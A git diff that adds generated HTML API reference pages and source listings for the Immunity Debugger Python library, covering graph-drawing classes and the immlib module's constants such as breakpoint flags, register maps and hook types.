281 debugger . Drawline ( self . handler , x , y , x , y + 3 , ImmDrawColors [ color ] )
+
282 debugger . Drawline ( self . handler , x , y , x , y - 3 , ImmDrawColors [ color ] )
+
283 debugger . Drawline ( self . handler , x , y , x + 3 , y + 3 , ImmDrawColors [ color ] )
+
284 debugger . Drawline ( self . handler , x , y , x - 3 , y + 3 , ImmDrawColors [ color ] )
+
285 debugger . Drawline ( self . handler , x , y , x + 3 , y - 3 , ImmDrawColors [ color ] )
+
286 debugger . Drawline ( self . handler , x , y , x - 3 , y - 3 , ImmDrawColors [ color ] )
+
287 return
+
288
+
290 self . start_x = width / 2
+
291 self . start_y = 10
+
292
+
293
+
295 return ( self . start_x , self . start_y )
+
296
+297
+298
+
301 """ Initialize the Drawing class"""
+
302 self . title = ""
+
303 self . start_address = 0
+
304 self . handler = 0
+
305 self . edgeproperties = [ ]
+
306
+
308 self . title = title
+
309 self . start_address = int ( start_address , 16 )
+
310 self . handler = debugger . Creategraphwindow ( title , self . start_address )
+
311 return self . handler
+
312
+
313
+
316
+
318 return self . handler
+
319
+
321 """ properties: { sourcename: "5" ,targetname: "6" ,label: "false", color: red }
+
322 """
+
323 self . edgeproperties . append ( properties )
+
324
+
325
+
327 return self . edgeproperties
+
328
+329
+330
+
333 """ Initialize the Line class"""
+
334 self . x_pos = 0
+
335 self . y_pos = 0
+
336 self . x_to = 0
+
337 self . y_to = 0
+
338 self . color = "Black"
+
339 self . handler = handler
+
340
+
341 - def draw ( self , x_pos , y_pos , x_to , y_to , color ) :
+
342 self . x_pos = x_pos
+
343 self . y_pos = y_pos
+
344 self . x_to = x_to
+
345 self . y_to = y_to
+
346 self . color = color
+
347 return debugger . Drawline ( self . handler , self . x_pos , self . y_pos , self . x_to , self . y_to , ImmDrawColors [ self . color ] )
+
348
+
349
+
351 return ( self . x_pos , self . y_pos , self . x_to , self . y_to )
+
352
+
355
+
358
+359
+360
+
363 """ Initialize the Recttext class"""
+
364 self . x1 = 0
+
365 self . y1 = 0
+
366 self . x2 = 0
+
367 self . y2 = 0
+
368 self . rely = 0
+
369 self . relx = 0
+
370 self . color = "Black"
+
371 self . text = ""
+
372 self . texth = 0
+
373 self . textw = 0
+
374 self . absy = 0
+
375 self . absx = 0
+
376 self . handler = handler
+
377 self . title = ""
+
378 self . label = ""
+
379 self . nodebuf = [ ]
+
380 self . child = [ ]
+
381
+
382
+
383 - def drawText ( self , x , y , text , color ) :
+
384 debugger . Error ( "e" )
+
385 theight = 0
+
386 for line in text :
+
387
+
388 asmline = line . split ( "||" ) [ 0 ]
+
389 commentline = line . split ( "||" ) [ 1 ]
+
390 debugger . Error ( "asm: %s\ncomment: %s" % ( asmline , commentline ) )
+
391 ( theight , twidth ) = debugger . Drawtext ( self . handler , x , y + self . texth , asmline , ImmDrawColors [ color ] )
+
392 ( theight , twidth2 ) = debugger . Drawtext ( self . handler , x + twidth , y + self . texth , commentline , ImmDrawColors [ "Red" ] )
+
393 twidth += twidth2
+
394 if twidth > self . textw :
+
395 self . textw = twidth
+
396 self . texth = self . texth + theight
+
397 return None
+
398
+
399 - def drawRect ( self , x1 , y1 , x2 , y2 , color ) :
+
400 self . x1 = x1
+
401 self . y1 = y1
+
402 self . x2 = x2
+
403 self . y2 = self . y2
+
404 self . color = color
+
405 return debugger . Drawrectangle ( self . handler , x1 , y1 , x2 , y2 , ImmDrawColors [ self . color ] )
+
406
+
409
+
412
+
415
+
418
+
421
+
423 return self . nodebuf
+
424
+
425
+
426
+
428 theight = 0
+
429 self . absy = 0
+
430 self . absx = 0
+
431 for line in text :
+
432 ( twidth , theight ) = debugger . Gettextsize ( self . handler , line )
+
433 if twidth > self . absx :
+
434 self . absx = twidth
+
435 self . absy = self . absy + theight
+
436 return ( self . absy + 4 , self . absx + 10 )
+
437
+
439 self . child . append ( child )
+
440
+
443
+
445 self . relx = x
+
446 self . rely = y
+
447
+
449 return ( self . relx , self . rely )
+
450
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.graphclass.Draw-class.html b/1.73/Documentation/Ref/Libs.graphclass.Draw-class.html
new file mode 100755
index 0000000..b7e7722
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.graphclass.Draw-class.html
@@ -0,0 +1,229 @@
+
+
+
+
+ Libs.graphclass.Draw
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class Draw source code
+
+
+
+
+
+
+
+
+
+ __init__ (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ createGraphWindow (self ,
+ title ,
+ start_address )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ setEdgeProperties (self ,
+ properties )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.graphclass.Graph-class.html b/1.73/Documentation/Ref/Libs.graphclass.Graph-class.html
new file mode 100755
index 0000000..952ee86
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.graphclass.Graph-class.html
@@ -0,0 +1,309 @@
+
+
+
+
+ Libs.graphclass.Graph
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class Graph source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ setHandler (self ,
+ handler )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ addVertices (self ,
+ vertices )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ addEdges (self ,
+ edges )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ setBitSize (self ,
+ vertices )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.graphclass.Line-class.html b/1.73/Documentation/Ref/Libs.graphclass.Line-class.html
new file mode 100755
index 0000000..394efd7
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.graphclass.Line-class.html
@@ -0,0 +1,214 @@
+
+
+
+
+ Libs.graphclass.Line
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class Line source code
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ handler )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ draw (self ,
+ x_pos ,
+ y_pos ,
+ x_to ,
+ y_to ,
+ color )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.graphclass.Vertex-class.html b/1.73/Documentation/Ref/Libs.graphclass.Vertex-class.html
new file mode 100755
index 0000000..9b11eb7
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.graphclass.Vertex-class.html
@@ -0,0 +1,730 @@
+
+
+
+
+ Libs.graphclass.Vertex
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class Vertex source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ addOutAdj (self ,
+ edge ,
+ type )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ setVertexBuffer (self ,
+ buf )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ isPlaced (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ calculateAbsoluteSize (self ,
+ text )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ placeVertex (self ,
+ x ,
+ y ,
+ text ,
+ textcolor ,
+ rectcolor ,
+ start )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ addEndPoint (x ,
+ y ,
+ color )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ setStartCoords (self ,
+ height ,
+ width )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.graphclass.vcgNode-class.html b/1.73/Documentation/Ref/Libs.graphclass.vcgNode-class.html
new file mode 100755
index 0000000..8efd56b
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.graphclass.vcgNode-class.html
@@ -0,0 +1,369 @@
+
+
+
+
+ Libs.graphclass.vcgNode
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class vcgNode source code
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ handler )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ drawText (self ,
+ x ,
+ y ,
+ text ,
+ color )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ drawRect (self ,
+ x1 ,
+ y1 ,
+ x2 ,
+ y2 ,
+ color )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.immlib-module.html b/1.73/Documentation/Ref/Libs.immlib-module.html
new file mode 100755
index 0000000..1367025
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.immlib-module.html
@@ -0,0 +1,1576 @@
+
+
+
+
+ Libs.immlib
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module immlib
+
+
+
+
+
+
+
+
+Module immlib source code
+Immunity Debugger API for python
+ (c) Immunity, Inc. 2004-2007
+ Immunity Inc.
+ Debugger API for python
+
+
+
+
+
+
+
+
+ __VERSION__ = '1.3'
+
+
+
+
+
+ BpKeys = {'VK_F2': 113, 'VK_F4': 115}
+
+
+
+
+
+ BpFlags = {'TY_ACTIVE': 512, 'TY_DISABLED': 1024, 'TY_KEEPCODE...
+
+
+
+
+
+ HB_FREE = 0
+
+
+
+
+
+
+ HB_CODE = 1
+
+
+
+
+
+
+ HB_ACCESS = 2
+
+
+
+
+
+
+ HB_WRITE = 3
+
+
+
+
+
+
+ HB_IO = 4
+
+
+
+
+
+
+ HB_ONESHOT = 5
+
+
+
+
+
+
+ HB_STOPAN = 6
+
+
+
+
+
+
+ HB_TEMP = 7
+
+
+
+
+
+
+ DebugerStatus = {'CLOSING': 5, 'EVENT': 2, 'FINISHED': 4, 'NON...
+
+
+
+
+
+ Register = {'EAX': 0, 'EBP': 5, 'EBX': 3, 'ECX': 1, 'EDI': 7, ...
+
+
+
+
+
+ PageFlags = {1: ' ', 2: 'R ', 4: 'RW ', 8: 'RW COW', 16: '...
+
+
+
+
+
+ ImmFonts = {'courier': 3, 'fixed': 0, 'fixedsys': 2, 'font5': ...
+
+
+
+
+
+ BpMemFlags = {'R': 1, 'S': 4096, 'W': 2}
+
+
+
+
+
+ MemoryProtection = {'PAGE_EXECUTE': 16, 'PAGE_EXECUTE_READ': 3...
+
+
+
+
+
+ IgnoreSingleStep = {'CONTINUE': 2, 'DISABLE': 0, 'FORCE': 1}
+
+
+
+
+
+ jmpTypeFlags = {'CALL': 3, 'CALL_INTER': 4, 'JUMP': 0, 'JUMP_C...
+
+
+
+
+
+ NM_NONAME = 0
+
+
+
+
+
+
+ NM_MODSEARCH = 253
+
+
+
+
+
+
+ NM_ANYNAME = 255
+
+
+
+
+
+
+ NM_PLUGCMD = 48
+
+
+
+
+
+
+ NM_LABEL = 49
+
+
+
+
+
+
+ NM_EXPORT = 50
+
+
+
+
+
+
+ NM_IMPORT = 51
+
+
+
+
+
+
+ NM_LIBRARY = 52
+
+
+
+
+
+
+ NM_CONST = 53
+
+
+
+
+
+
+ NM_COMMENT = 54
+
+
+
+
+
+
+ NM_LIBCOMM = 55
+
+
+
+
+
+
+ NM_BREAK = 56
+
+
+
+
+
+
+ NM_ARG = 57
+
+
+
+
+
+
+ NM_ANALYSE = 58
+
+
+
+
+
+
+ NM_BREAKEXPR = 59
+
+
+
+
+
+
+ NM_BREAKEXPL = 60
+
+
+
+
+
+
+ NM_ASSUME = 61
+
+
+
+
+
+
+ NM_STRUCT = 62
+
+
+
+
+
+
+ NM_CASE = 63
+
+
+
+
+
+
+ NM_INSPECT = 64
+
+
+
+
+
+
+ NM_WATCH = 65
+
+
+
+
+
+
+ NM_ASM = 66
+
+
+
+
+
+
+ NM_FINDASM = 67
+
+
+
+
+
+
+ NM_LASTWATCH = 72
+
+
+
+
+
+
+ NM_SOURCE = 73
+
+
+
+
+
+
+ NM_REFTXT = 74
+
+
+
+
+
+
+ NM_GOTO = 75
+
+
+
+
+
+
+ NM_GOTODUMP = 76
+
+
+
+
+
+
+ NM_TRPAUSE = 77
+
+
+
+
+
+
+ NM_DLLPARMS = 80
+
+
+
+
+
+
+ NM_DEBUG = 128
+
+
+
+
+
+
+ NM_IMPLIB = 129
+
+
+
+
+
+
+ NM_IMPNAME = 130
+
+
+
+
+
+
+ NM_FONT = 131
+
+
+
+
+
+
+ NM_SCHEME = 132
+
+
+
+
+
+
+ NM_GOTOSTACK = 133
+
+
+
+
+
+
+ NM_HILITE = 134
+
+
+
+
+
+
+ NM_IMCALL = 254
+
+
+
+
+
+
+ ImmDrawColors = {'Aqua': 16776960, 'Black': 0, 'Blue': 1671168...
+
+
+
+
+
+ COUNT = 100
+
+
+
+
+
+
+ C_BAD = 240
+
+
+
+
+
+
+ C_CAL = 112
+
+
+
+
+
+
+ C_CMD = 0
+
+
+
+
+
+
+ C_FLG = 144
+
+
+
+
+
+
+ C_FLT = 64
+
+
+
+
+
+
+ C_JMC = 96
+
+
+
+
+
+
+ C_JMP = 80
+
+
+
+
+
+
+ C_MMX = 48
+
+
+
+
+
+
+ C_NOW = 224
+
+
+
+
+
+
+ C_POP = 32
+
+
+
+
+
+
+ C_PRI = 192
+
+
+
+
+
+
+ C_PSH = 16
+
+
+
+
+
+
+ C_REP = 176
+
+
+
+
+
+
+ C_RET = 128
+
+
+
+
+
+
+ C_RTF = 160
+
+
+
+
+
+
+ C_SSE = 208
+
+
+
+
+
+
+ C_TYPEMASK = 240
+
+
+
+
+
+
+ DECR_3DNOW = 45
+
+
+
+
+
+
+ DECR_BYTE = 33
+
+
+
+
+
+
+ DECR_DWORD = 36
+
+
+
+
+
+
+ DECR_FLOAT10 = 41
+
+
+
+
+
+
+ DECR_ISREG = 32
+
+
+
+
+
+
+ DECR_QWORD = 40
+
+
+
+
+
+
+ DECR_SEG = 42
+
+
+
+
+
+
+ DECR_SSE = 46
+
+
+
+
+
+
+ DECR_TYPEMASK = 63
+
+
+
+
+
+
+ DECR_WORD = 34
+
+
+
+
+
+
+ DEC_3DNOW = 13
+
+
+
+
+
+
+ DEC_BYTE = 1
+
+
+
+
+
+
+ DEC_BYTESW = 17
+
+
+
+
+
+
+ DEC_CALLDEST = 31
+
+
+
+
+
+
+ DEC_CHECKED = 128
+
+
+
+
+
+
+ DEC_COMMAND = 29
+
+
+
+
+
+
+ DEC_CONST = 64
+
+
+
+
+
+
+ DEC_DWORD = 4
+
+
+
+
+
+
+ DEC_FLOAT10 = 9
+
+
+
+
+
+
+ DEC_FLOAT4 = 5
+
+
+
+
+
+
+ DEC_FLOAT8 = 7
+
+
+
+
+
+
+ DEC_FWORD = 6
+
+
+
+
+
+
+ DEC_JMPDEST = 30
+
+
+
+
+
+
+ DEC_NEXTCODE = 19
+
+
+
+
+
+
+ DEC_NEXTDATA = 3
+
+
+
+
+
+
+ DEC_PBODY = 64
+
+
+
+
+
+
+ DEC_PEND = 96
+
+
+
+
+
+
+ DEC_PROC = 32
+
+
+
+
+
+
+ DEC_PROCMASK = 96
+
+
+
+
+
+
+ DEC_QWORD = 8
+
+
+
+
+
+
+ DEC_SIGNED = 256
+
+
+
+
+
+
+ DEC_SSE = 14
+
+
+
+
+
+
+ DEC_STRING = 11
+
+
+
+
+
+
+ DEC_TBYTE = 10
+
+
+
+
+
+
+ DEC_TEXT = 16
+
+
+
+
+
+
+ DEC_TYPEMASK = 31
+
+
+
+
+
+
+ DEC_UNICODE = 12
+
+
+
+
+
+
+ DEC_UNKNOWN = 0
+
+
+
+
+
+
+ DEC_WORD = 2
+
+
+
+
+
+
+ DISASM_ALL = 5
+
+
+
+
+
+
+ DISASM_CODE = 4
+
+
+
+
+
+
+ DISASM_DATA = 1
+
+
+
+
+
+
+ DISASM_FILE = 3
+
+
+
+
+
+
+ DISASM_RTRACE = 6
+
+
+
+
+
+
+ DISASM_SIZE = 0
+
+
+
+
+
+
+ DISASM_TRACE = 2
+
+
+
+
+
+
+ EXCEPTION_CODE = {2147483649: 'GuardPage', 2147483651: 'Breakp...
+
+
+
+
+
+ FS_HOOK = 1
+
+
+
+
+
+
+ FS_PAUSE = 2
+
+
+
+
+
+
+ FS_UNHOOK = 0
+
+
+
+
+
+
+ HOOK_REG = {'EAX': '[ESP+0x1C]', 'EBP': '[ESP+0x8 ]', 'EBX': '...
+
+
+
+
+
+ HookTypes = {'ACCESS_VIOLATION_HOOK': 3910, 'CREATE_PROCESS_HO...
+
+
+
+
+
+ RST_INDIRECT = 3
+
+
+
+
+
+
+ RST_INVALID = 0
+
+
+
+
+
+
+ RST_VALUE = 1
+
+
+
+
+
+
+ RST_VFIXUP = 2
+
+
+
+
+
+
+ RegisterName = {(0, 0, 0, 0, 0, 0, 0, 0): '', (0, 0, 0, 0, 0, ...
+
+
+
+
+
+ Registers16BitsOrder = ['AX', 'CX', 'DX', 'BX', 'SP', 'BP', 'S...
+
+
+
+
+
+ Registers32BitsOrder = ['EAX', 'ECX', 'EDX', 'EBX', 'ESP', 'EB...
+
+
+
+
+
+ Registers8BitsOrder = ['AL', 'CL', 'DL', 'BL', 'AH', 'CH', 'DH...
+
+
+
+
+
+
+ BpFlags
+
+
+
+
+ Value:
+
+{'TY_ACTIVE': 512,
+ 'TY_DISABLED': 1024,
+ 'TY_KEEPCODE': 8192,
+ 'TY_KEEPCOND': 16384,
+ 'TY_NOUPDATE': 32768,
+ 'TY_ONESHOT': 2048,
+ 'TY_RTRACE': 65536,
+ 'TY_SET': 256,
+...
+
+
+
+
+
+
+ DebugerStatus
+
+
+
+
+ Value:
+
+{'CLOSING': 5,
+ 'EVENT': 2,
+ 'FINISHED': 4,
+ 'NONE': 0,
+ 'RUNNING': 3,
+ 'STOPPED': 1}
+
+
+
+
+
+
+ Register
+
+
+
+
+ Value:
+
+{'EAX': 0,
+ 'EBP': 5,
+ 'EBX': 3,
+ 'ECX': 1,
+ 'EDI': 7,
+ 'EDX': 2,
+ 'EIP': 8,
+ 'ESI': 6,
+...
+
+
+
+
+
+
+ PageFlags
+
+
+
+
+ Value:
+
+{1: ' ',
+ 2: 'R ',
+ 4: 'RW ',
+ 8: 'RW COW',
+ 16: ' E',
+ 32: 'R E',
+ 64: 'RWE',
+ 128: 'RWE COW'}
+
+
+
+
+
+
+ ImmFonts
+
+
+
+
+ Value:
+
+{'courier': 3,
+ 'fixed': 0,
+ 'fixedsys': 2,
+ 'font5': 5,
+ 'font6': 6,
+ 'font7': 7,
+ 'info': 10,
+ 'lucida': 4,
+...
+
+
+
+
+
+
+ MemoryProtection
+
+
+
+
+ Value:
+
+{'PAGE_EXECUTE': 16,
+ 'PAGE_EXECUTE_READ': 32,
+ 'PAGE_EXECUTE_READWRITE': 64,
+ 'PAGE_EXECUTE_WRITECOPY': 128,
+ 'PAGE_NOACCESS': 1,
+ 'PAGE_READONLY': 2,
+ 'PAGE_READWRITE': 4,
+ 'PAGE_WRITECOPY': 8}
+
+
+
+
+
+
+ jmpTypeFlags
+
+
+
+
+ Value:
+
+{'CALL': 3,
+ 'CALL_INTER': 4,
+ 'JUMP': 0,
+ 'JUMP_COND': 1,
+ 'JUMP_SWITCH': 2}
+
+
+
+
+
+
+ ImmDrawColors
+
+
+
+
+ Value:
+
+{'Aqua': 16776960,
+ 'Black': 0,
+ 'Blue': 16711680,
+ 'Cream': 15793151,
+ 'DarkGray': 8421504,
+ 'Fuchsia': 16711935,
+ 'Gray': 8421504,
+ 'Green': 32768,
+...
+
+
+
+
+
+
+ EXCEPTION_CODE
+
+
+
+
+ Value:
+
+{2147483649: 'GuardPage',
+ 2147483651: 'Breakpoint',
+ 2147483652: 'SingleStep',
+ 3221225477: 'AccessViolation',
+ 3221225501: 'IllegalInstruction',
+ 3221225509: 'NonContinuableException',
+ 3221225612: 'ArrayBoundsExceeded',
+ 3221225613: 'FltDenormalOperand',
+...
+
+
+
+
+
+
+ HOOK_REG
+
+
+
+
+ Value:
+
+{'EAX': '[ESP+0x1C]',
+ 'EBP': '[ESP+0x8 ]',
+ 'EBX': '[ESP+0x10]',
+ 'ECX': '[ESP+0x18]',
+ 'EDI': '[ESP]',
+ 'EDX': '[ESP+0x14]',
+ 'ESI': '[ESP+4 ]',
+ 'ESP': '[ESP+0xC ]'}
+
+
+
+
+
+
+ HookTypes
+
+
+
+
+ Value:
+
+{'ACCESS_VIOLATION_HOOK': 3910,
+ 'CREATE_PROCESS_HOOK': 3907,
+ 'CREATE_THREAD_HOOK': 3905,
+ 'EVERY_EXCEPTION_HOOK': 3901,
+ 'EXIT_PROCESS_HOOK': 3908,
+ 'EXIT_THREAD_HOOK': 3906,
+ 'LOAD_DLL_HOOK': 3903,
+ 'LOG_BP_HOOK': 3909,
+...
+
+
+
+
+
+
+ RegisterName
+
+
+
+
+ Value:
+
+{(0, 0, 0, 0, 0, 0, 0, 0): '',
+ (0, 0, 0, 0, 0, 0, 0, 1): 'EDI',
+ (0, 0, 0, 0, 0, 0, 1, 0): 'ESI',
+ (0, 0, 0, 0, 0, 1, 0, 0): 'EBP',
+ (0, 0, 0, 0, 1, 0, 0, 0): 'ESP',
+ (0, 0, 0, 1, 0, 0, 0, 0): 'EBX',
+ (0, 0, 1, 0, 0, 0, 0, 0): 'EDX',
+ (0, 1, 0, 0, 0, 0, 0, 0): 'ECX',
+...
+
+
+
+
+
+
+ Registers16BitsOrder
+
+
+
+
+ Value:
+
+['AX', 'CX', 'DX', 'BX', 'SP', 'BP', 'SI', 'DI']
+
+
+
+
+
+
+ Registers32BitsOrder
+
+
+
+
+ Value:
+
+['EAX', 'ECX', 'EDX', 'EBX', 'ESP', 'EBP', 'ESI', 'EDI']
+
+
+
+
+
+
+ Registers8BitsOrder
+
+
+
+
+ Value:
+
+['AL', 'CL', 'DL', 'BL', 'AH', 'CH', 'DH', 'BH']
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.immlib-pysrc.html b/1.73/Documentation/Ref/Libs.immlib-pysrc.html
new file mode 100755
index 0000000..070e015
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.immlib-pysrc.html
@@ -0,0 +1,3386 @@
+
+
+
+
+ Libs.immlib
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module immlib
+
+
+
+
+
+
+
+
+
+ 1
+ 2 """ 3 Immunity Debugger API for python 4 5 (c) Immunity, Inc. 2004-2007 6 7 8 U{Immunity Inc.<http://www.immunityinc.com>} Debugger API for python 9 10 11 """ 12
+ 13 __VERSION__ = '1.3' 14
+ 15
+ 16 import debugger 17 import immutils 18 import string 19 import time 20 import struct 21 import pickle 22 import cPickle 23 import libheap 24
+ 25 from libhook import * 26 from libevent import * 27 from debugtypes import * 28 from libanalyze import * 29 from librecognition import FunctionRecognition 30 from libcontrolflow import ControlFlowAnalysis 31
+ 32
+ 33 BpKeys = { "VK_F2" : 0x71 , "VK_F4" : 0x73 } 34 BpFlags = { "TY_STOPAN" : 0x80L , "TY_SET" : 0x100L , "TY_ACTIVE" : 0x200L , "TY_DISABLED" : 0x400 , \ 35 "TY_ONESHOT" : 0x800L , "TY_TEMP" : 0x1000L , "TY_KEEPCODE" : 0x2000L , "TY_KEEPCOND" : 0x4000L , \
+ 36 "TY_NOUPDATE" : 0x8000 , "TY_RTRACE" : 0x10000 }
+ 37
+ 38
+ 39
+ 40 HB_FREE = 0 41 HB_CODE = 1 42 HB_ACCESS = 2 43 HB_WRITE = 3 44 HB_IO = 4 45 HB_ONESHOT = 5 46 HB_STOPAN = 6 47 HB_TEMP = 7 48
+ 49 DebugerStatus = { "NONE" : 0 , "STOPPED" : 1 , "EVENT" : 2 , "RUNNING" : 3 , "FINISHED" : 4 , "CLOSING" : 5 } 50
+ 51 Register = { "EAX" : 0 , "ECX" : 1 , "EDX" : 2 , "EBX" : 3 , "ESP" : 4 , "EBP" : 5 , "ESI" : 6 , "EDI" : 7 , "EIP" : 8 } 52
+ 53 PageFlags = { 0x1 : " " , 0x2 : "R " , 0x4 : "RW " , 0x8 : "RW COW" , 0x10 : " E" , \ 54 0x20 : "R E" , 0x40 : "RWE" , 0x80 : "RWE COW" }
+ 55
+ 56 ImmFonts = { "fixed" : 0 , "terminal6" : 1 , "fixedsys" : 2 , "courier" : 3 , "lucida" : 4 , "font5" : 5 , \ 57 "font6" : 6 , "font7" : 7 , "main" : 8 , "sys" : 9 , "info" : 10 }
+ 58
+ 59
+ 60
+ 61 BpMemFlags = { "R" : 0x1 , "W" : 0x2 , "S" : 0x1000L } 62
+ 63 MemoryProtection = { "PAGE_EXECUTE" : 0x10 , "PAGE_EXECUTE_READ" : 0x20 , "PAGE_EXECUTE_READWRITE" : 0x40 , \ 64 "PAGE_EXECUTE_WRITECOPY" : 0x80 , "PAGE_NOACCESS" : 0x01 , "PAGE_READONLY" : 0x02 , \
+ 65 "PAGE_READWRITE" : 0x04 , "PAGE_WRITECOPY" : 0x08 }
+ 66
+ 67
+ 68
+ 69 IgnoreSingleStep = { "DISABLE" : 0 , "FORCE" : 1 , "CONTINUE" : 2 } 70
+ 71
+ 72
+ 73
+ 74
+ 75
+ 76
+ 77
+ 78 jmpTypeFlags = { "JUMP" : 0 , \ 79 "JUMP_COND" : 1 , \
+ 80 "JUMP_SWITCH" : 2 , \
+ 81 "CALL" : 3 , \
+ 82 "CALL_INTER" : 4 }
+ 83
+ 84
+ 85 NM_NONAME = 0x00 86 NM_MODSEARCH = 0xFD 87 NM_ANYNAME = 0xFF 88
+ 89 NM_PLUGCMD = 0x30 90 NM_LABEL = 0x31 91 NM_EXPORT = 0x32 92 NM_IMPORT = 0x33 93 NM_LIBRARY = 0x34 94 NM_CONST = 0x35 95 NM_COMMENT = 0x36 96 NM_LIBCOMM = 0x37 97 NM_BREAK = 0x38 98 NM_ARG = 0x39 99 NM_ANALYSE = 0x3A 100 NM_BREAKEXPR = 0x3B 101 NM_BREAKEXPL = 0x3C 102 NM_ASSUME = 0x3D 103 NM_STRUCT = 0x3E 104 NM_CASE = 0x3F 105
+ 106 NM_INSPECT = 0x40 107 NM_WATCH = 0x41 108 NM_ASM = 0x42 109 NM_FINDASM = 0x43 110 NM_LASTWATCH = 0x48 111 NM_SOURCE = 0x49 112 NM_REFTXT = 0x4A 113 NM_GOTO = 0x4B 114 NM_GOTODUMP = 0x4C 115 NM_TRPAUSE = 0x4D 116
+ 117 NM_DLLPARMS = 0x50 118
+ 119 NM_DEBUG = 0x80 120 NM_IMPLIB = 0x81 121 NM_IMPNAME = 0x82 122 NM_FONT = 0x83 123 NM_SCHEME = 0x84 124 NM_GOTOSTACK = 0x85 125 NM_HILITE = 0x86 126
+ 127 NM_IMCALL = 0xFE 128
+ 129
+ 130 import UserDict 131
+ 132
+ 133 - class DictTypes ( UserDict . IterableUserDict ) :
+
135 UserDict . IterableUserDict . __init__ ( self )
+
137 for k in self . data . keys ( ) :
+
138 yield self . data [ k ]
+
139
+ 140
